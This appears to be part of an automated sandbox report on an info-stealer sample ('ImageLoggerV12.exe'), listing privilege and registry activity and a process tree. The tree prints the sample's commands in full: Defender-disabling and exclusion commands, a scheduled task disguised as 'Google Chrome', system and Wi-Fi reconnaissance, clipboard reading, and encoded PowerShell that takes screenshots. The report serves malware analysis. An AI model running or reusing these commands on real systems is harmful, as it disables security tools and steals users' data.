| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\GC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLoggerV12.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAawBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAdgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAeABlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAegBsACMAPgA="
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Users\Admin\AppData\Roaming\Logger.exe
"C:\Users\Admin\AppData\Roaming\Logger.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4648,i,16866810346450717340,3849854439116899380,262144 --variations-seed-version --mojo-platform-channel-handle=3704 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\mainPannel.exe
"C:\Users\Admin\AppData\Local\Temp\mainPannel.exe"
C:\Users\Admin\AppData\Local\Temp\UI.exe
"C:\Users\Admin\AppData\Local\Temp\UI.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Logger.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Users\Admin\AppData\Local\Temp\GC.exe
"C:\Users\Admin\AppData\Local\Temp\GC.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Logger.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe
"C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Google Chrome" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\CasNic.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mBPJkwhALgfQ.bat" "
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\netsh.exe
netsh wlan show profile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAK